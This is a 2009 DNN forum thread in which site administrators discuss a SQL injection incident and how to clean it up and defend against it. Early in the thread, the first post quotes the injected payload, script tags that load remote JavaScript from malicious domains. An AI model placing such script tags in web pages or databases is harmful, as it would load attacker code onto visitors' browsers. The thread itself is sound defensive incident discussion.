Products

Solutions

Resources

Partners

Community

Blog

About

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen

HomeHomeUsing DNN Platf...Using DNN Platf...Administration ...Administration ...Script Injection on DNN 4.9.4Script Injection on DNN 4.9.4
Previous
 
Next
New Post
8/7/2009 9:24 AM
 

I just wanted to throw somehting out that we just saw on a 4.9.4 portal installation we have.  We found that "<script src=http://a0v.org/x.js></script>" and sometimes "<script src=http://f1y.in/j.js<script src=http://a0v.org/x.js></script>" had been inserted at the end of all of the role descriptions in a DNN 4.9.4 installation.  These scripts were calling http://dt.tongji.linezing.com.  This may not be related to these modules, but this installation is running ASPDNSF, Venexxus, DNNMaster Multi Portal User Sharing, and a few others. 

It looks like the only injection was in the Roles table and we are investigating how this happened right now.  If anyone has seen this before or has ideas about how to troubleshoot I would certainly welcome them.  Thanks to all!

 

 

 
New Post
8/7/2009 9:38 AM
 

Spence,

A few things.

1.) I have seen this type of injection before, however, in all cases it was not related to DNN or a DNN module
2.) If you need help cleaning the SQL let me know, been there done that many times
3.) I would be sure to review your entire server configurtaion.


-Mitchel Sellers
Microsoft MVP, ASPInsider, DNN MVP
CEO/Director of Development - IowaComputerGurus Inc.
LinkedIn Profile

Visit mitchelsellers.com for my mostly DNN Blog and support forum.

Visit IowaComputerGurus.com for free DNN Modules, DNN Performance Tips, DNN Consulting Quotes, and DNN Technical Support Services
 
New Post
8/7/2009 9:48 AM
 

Thanks Michael.  It makes me feel so much better that we are not the only ones this is happening to.

To update the situation a bit.  We had a port open on our firewall to allow an outside client to connect directly to MSSQL.  We of course had this port limited to the client's source IP on the hardware firrewall, but as a precaution we have blocked that port and told MSSQL to disallow remote connections.  This is about the only way we can see anybody getting in to the MSSQL server. 

We went through and manually cleaned the data in the affected table and are planning on running a script this evening to search all the tables for the same script string that was injected.  We've been through the server logs and DNN's event log and don't see anything out of the ordinary.  Our bandwidth graphs don't show a spike either.  We've been passing our PCI compliance scans with ControlScan and had an outside firm do a security audit a few months ago.  I don't know what more we can do?  Do you have any advice? 

 
New Post
8/7/2009 10:34 AM
 

My website got SQL injection hacked as well.  Only it seems to have put in hidden div tags with stuff to pharmaceutical sites in it...how do I clean my tables of these and stop future hacks.  I am on a shared MSSQL db being hosted by a 3rd party.

 As well I can't find it in any of the tables.  Is there a table in DNN that would hold the information that is below the </body> tag as that is where it is placed?

Nolan

 
New Post
8/7/2009 11:11 AM
 

Please note, we prefer suspected security issues to be emailed to the team via security@dotnetnuke.com , as we don't want to give potential hackers any useful information if possible. If you email the security alias and we can validate the details, we will fix the issue and create a new version if approriate. However, in this case I am confident it is not a DotNetNuke issue. I've copied a recent response I made to a report sent in below, hopefully it will provide some help.

We've had a number of reports of this over the past 6 months or so and in each case it was traced to a non-core DotNetNuke root cause (which is not surprising as we don't have any code in either the core or the core projects that is susceptible to sql injection). The majority of these were legacy applications (primarily old asp applications), whilst others were infected by exploited desktop applications such as realplayer (http://news.softpedia.com/news/New-SQL-Injection-Worm-Found-Loose-On-The-Web-85124.shtml) . Still others were traced to 3rd party components, and we know of a few of these from anecdotal evidence (primarily forum posts on dotnetnuke.com), but have not got source code of these projects so cannot confirm it ourselves and have to trust in the original reporters findings.

 

In general I have found UrlScan 3.0 or above to be a very effective protection against these attacks - http://www.microsoft.com/downloads/details.aspx?FamilyId=EE41818F-3363-4E24-9940-321603531989&displaylang=en . Whilst it doesn't fix the root cause of many of these problems it does stop the attacks by rejecting the sql injection strings.

 

I'd also recommend you read http://misfitgeek.com/blog/tools-to-block-eradicate-sql-injection/ , particularly if you're developing your own custom modules.

 

Finally, I find this script to be very useful in identifying the database tables that have iframe's injected into them. http://vyaskn.tripod.com/search_all_columns_in_all_tables.htm

 


Buy the new Professional DNN7: Open Source .NET CMS Platform book Amazon US
 
Previous
 
Next
HomeHomeUsing DNN Platf...Using DNN Platf...Administration ...Administration ...Script Injection on DNN 4.9.4Script Injection on DNN 4.9.4


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out